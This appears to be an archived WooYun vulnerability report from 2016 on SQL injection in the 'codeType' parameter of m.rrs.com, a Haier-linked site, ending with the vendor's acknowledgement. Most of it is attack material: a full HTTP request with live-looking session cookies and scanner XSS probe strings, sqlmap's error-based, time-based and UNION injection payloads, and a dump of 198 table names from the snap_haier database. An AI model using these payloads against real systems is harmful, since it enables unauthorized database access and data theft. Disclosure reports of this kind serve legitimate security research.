乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-27: 细节已通知厂商并且等待厂商处理中 2016-03-28: 厂商已经确认,细节仅向厂商公开 2016-04-07: 细节向核心白帽子及相关领域专家公开 2016-04-17: 细节向普通白帽子公开 2016-04-27: 细节向实习白帽子公开 2016-05-12: 细节向公众公开
POST /snaplb/anonymous/topic/portal/getinfo/menulevel.ajax HTTP/1.1Content-Length: 165Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://m.rrs.com/Cookie: JSESSIONID=6BB715282853FBB57DCF1DFE2D7962E4; rrs.com_ehaier_sessionid=FEDF8DA0437C291AEE6EDC3567778935; rrs.com_ehaier_refererUrl=aHR0cDovL20ucnJzLmNvbS9tb2JpbGUvaXRlbWxpc3QvODEyLTgyOC5odG1s; rrs.com_ehaier_loginReturnUrl="aHR0cDovL20ucnJzLmNvbS9ycnNtL2pzL3VzZXJDZW50ZXIvdG9waWNUcmVuZHMuanM="; RRSSESS=nbktcaight0u9lpntcj7sa9734; laravel_session=eyJpdiI6InRVZXJTejJrMDFDMjVSOFNiSzBQdmc9PSIsInZhbHVlIjoiSWpVaFgwR1RPMkxVQnRNK2o4UmQ4dGJFZFJITkhqbXhLNDFBM284UUlCUVQwaGt5MjVCakhQbVFPSGdNYjZrbjBJSlZRcWRGTnN3eHlkZVdmdXNNb2c9PSIsIm1hYyI6IjVlYWZlZTMxZDAyYmU4ZmJkYzBjNjFhMzAwOGI4Mjk0NmY5OTA0YmJiNjAyZWI5NGVjN2IwYzliZmUzYzU1NjQifQ%3D%3D; JSESSIONID=4569D02C11EF71F0CAFB0F0A7690BFD8; Hm_lvt_e1b611e8ea607634925d9684f4e559e5=1458241583,1458241633,1458241909,1458241976; Hm_lpvt_e1b611e8ea607634925d9684f4e559e5=1458241976; ZXKJSESSIONID=c0c62de1-1343-ad45-7421-f971c94ccdd0***1; UniqueName=c0c62de1-1343-ad45-7421-f971c94ccdd0; _jzqa=1.560472377653304000.1458241583.1458241583.1458241583.1; _jzqc=1; _jzqx=1.1458241583.1458241583.1.jzqsr=acunetix-referrer%2Ecom|jzqct=/javascript:domxssexecutionsink(0,"'\"><xsstag>()refdxss").-; _jzqckmp=1; _jzqb=1.25.10.1458241583.1; _qzja=1.926454417.1458241583146.1458241583146.1458241583146.1458245661078.1458245666164.%257B%257B_USER__name%257D%257D.1.0.25.1; _qzjb=1.1458241583146.25.0.0.0; _qzjc=1; _qzjto=25.1.0; HMACCOUNT=95BFDBC323634449; BAIDUID=ED24CCC23C3BE7686BBE72E1E8129867:FG=1; _gsref_113428431=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); _gscu_113428431=58241636ioblyg52; _gscs_113428431=582416367giz1z52|pv:4; _gscbrs_113428431=1; NTKF_T2D_CLIENTID=guest13D5BCDF-B906-C5F7-5BE1-A56637825F9A; nTalk_CACHE_DATA={uid:he_1000_ISME9754_guest13D5BCDF-B906-C5,tid:1458241708410836,opd:1}; Hm_lvt_504222469397f794ea8da61f8a4e10e2=1458245176,1458245416,1458245661,1458245666; Hm_lpvt_504222469397f794ea8da61f8a4e10e2=1458245666; SERVERID=517c5a75fca63025cdd23cd01677fbf1|1458242592|1458242592; nTalk_PAGE_MANAGE={|m|:[{|58675|:|417586|}],|t|:|03:09:18|}; v=HRJ>/T(eXv:I(</%cy0e; PHPSESSID=jmrh61au3951s6mclpce3c12j1; Hm_lvt_972125b56f85b5c6ce2c83fd9305649e=1458245416,1458245421,1458245661,1458245666; Hm_lpvt_972125b56f85b5c6ce2c83fd9305649e=1458245666; _pzfxuvpc=1458243216321%7C1051074224135473284%7C9%7C1458245666128%7C1%7C%7C1177309196129166193; _pzfxsvpc=1177309196129166193%7C1458243216321%7C9%7Chttp%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); __xsptplus163=163.1.1458243218.1458245666.20%233%7Cwww.acunetix-referrer.com%7C%7C%7C%7C%23%23KWrgyHYXnfCeTmB1b91bKeoAudzdq5II%23; zid=3a2785ab348b7423d172a4984f56be00; avr_137032388_0_0_4294901760_271286987_0=1846284221_55418697Host: m.rrs.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*codeType=1&codeTypeName=&parent=
codeType参数存在sql注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: codeType (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: codeType=1' AND (SELECT 3647 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(3647=3647,1))),0x7170787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rxoO'='rxoO&codeTypeName=&parent= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: codeType=1' AND (SELECT * FROM (SELECT(SLEEP(5)))jxRE) AND 'MbDQ'='MbDQ&codeTypeName=&parent= Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: codeType=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b7071,0x6c644472464b666b494e,0x7170787071),NULL,NULL,NULL,NULL,NULL-- &codeTypeName=&parent=---back-end DBMS: MySQL >= 5.0.0Database: snap_haier[198 tables]+---------------------------------------+| activity_clean_code_data || area_data || area_data_bak || area_data_bak_13121101 || attachment || attitude_of_user_toward_object || attitude_statistics_toward_object || best_service_case || blog_attachment || blog_attachment_download_record || blog_comment || blog_excellent_record || blog_image || blog_lightblog || blog_lightblog_statistics || blog_like_record || blog_report_record || branch_record || city_data_weather || cms_base || cms_base_content_ref || cms_content || cms_content_top || code || comment_guide_info_pc || comment_guide_info_tbl || common_click_count || content_filter_word || credit_blog_record || credit_contribution_record || credit_record || credit_setting || daily_recommend || ds_business_oppo_et || ds_room_picture_et || ds_room_picture_et_copy || dynamic_image || faq_content || feed || feed_all_inbox || feed_followed_inbox || feed_followed_personal_inbox || feed_follower_personal_about_me_inbox || feed_follower_personal_inbox || feed_integrated_inbox || feed_topic_followed_inbox || feed_topic_inbox || feed_topic_personal_inbox || following_count || following_log || following_relation || gf_gift_receive_record_et || gift_packs || gift_packs_detail || gift_packs_user_ref || hot_lightblog_historical || hot_lightblog_monthly || hot_lightblog_weekly || interact_topic || interact_topic_category || interact_topic_comment || interact_topic_count || interact_topic_four_type || interact_topic_good || interact_topic_vote || invitation || invitation_authority || leave_message_tbl || lg_interface_invoke_et || lg_interface_invoke_ht || lg_job_et || login_record || ls_appraise_record_et || ls_appraise_record_ht || ls_workorder_et || ls_workorder_ht || ls_workorder_waiter_et || magnetic_stripe_table || monthly_top20_blogs || mytest || notification || notification_template || parameters_config || personal_setting_item || personal_setting_item_spec || personal_setting_value_spec || prize || product_failure || product_pic || product_register_record || recommendation || refered_user_recent_record || register_invitation_code || register_temporary_record || rel_wiki_hotkey || rel_wiki_one || sh_experience_comment_et || sh_experience_praise_et || sh_experience_recommend_et || sh_experience_recommend_ht || sh_experience_statistics_et || sh_free_comment_et || sh_haier_back_record || sh_user_win || sh_user_win_comment_et || sh_user_win_praise_et || share_stuff || share_stuff_comment || share_stuff_good || share_stuff_tags || social_assess_record || st_appraise_record || st_social_assess_record || st_workorder || star_shop_table || strainer_record || sys_data || sys_mode_info || tag || tag_map || template || test || tmp_ds_room_picture_et || tmp_ls_workorder_et_bak || tmp_sh_user_win || tmp_sys_mode_info || tmp_user_hits_hot || tmp_user_integral_details_all || tmp_userprofile || tmp_userprofile_bak || topic || topic_category || topic_reply_detail || topic_statistics || topic_statistics_of_user || topic_subscription_record || topic_visit_record || unit_base_data || unit_base_data_bak || unit_house_data || unit_house_data_bak || unit_house_data_bak_13121101 || unit_house_data_copy || unit_house_temp || unit_shop_data || up_city_info || up_codelist || up_province_et || up_province_et_copy || user_account || user_account_copy || user_address || user_address_for_act || user_area_record || user_authority || user_business_authority || user_daily_recommend || user_friends_tbl || user_goodskill_rt || user_goodskill_rt_bak || user_hits_hot || user_integral_details_all || user_integral_details_one || user_integral_grade || user_integral_prize || user_integral_source || user_refer_record || user_regist_tbl || user_related_policy || userprofile || userprofile_achievement || userprofile_bak || userprofile_complete_degree || userprofile_education_experience || userprofile_obtain_phone_record || userprofile_project_experience || userprofile_project_experience_detail || userprofile_skill_support_record || userprofile_skill_support_statistics || userprofile_statistics || userprofile_training_experience || userprofile_work_experience || value_added_products || visit || vote || vote_detail || vote_option || vote_result || water_purifier || web_click_count || web_click_uv_count || wiki_base || wiki_base_content_ref || wiki_content || wiki_content_top || winning_info || world_cup_activity_tbl || world_cup_support_num |+---------------------------------------+
危害等级:高
漏洞Rank:15
确认时间:2016-03-28 09:17
感谢白帽子的提醒与测试,已安排人员进行处理
暂无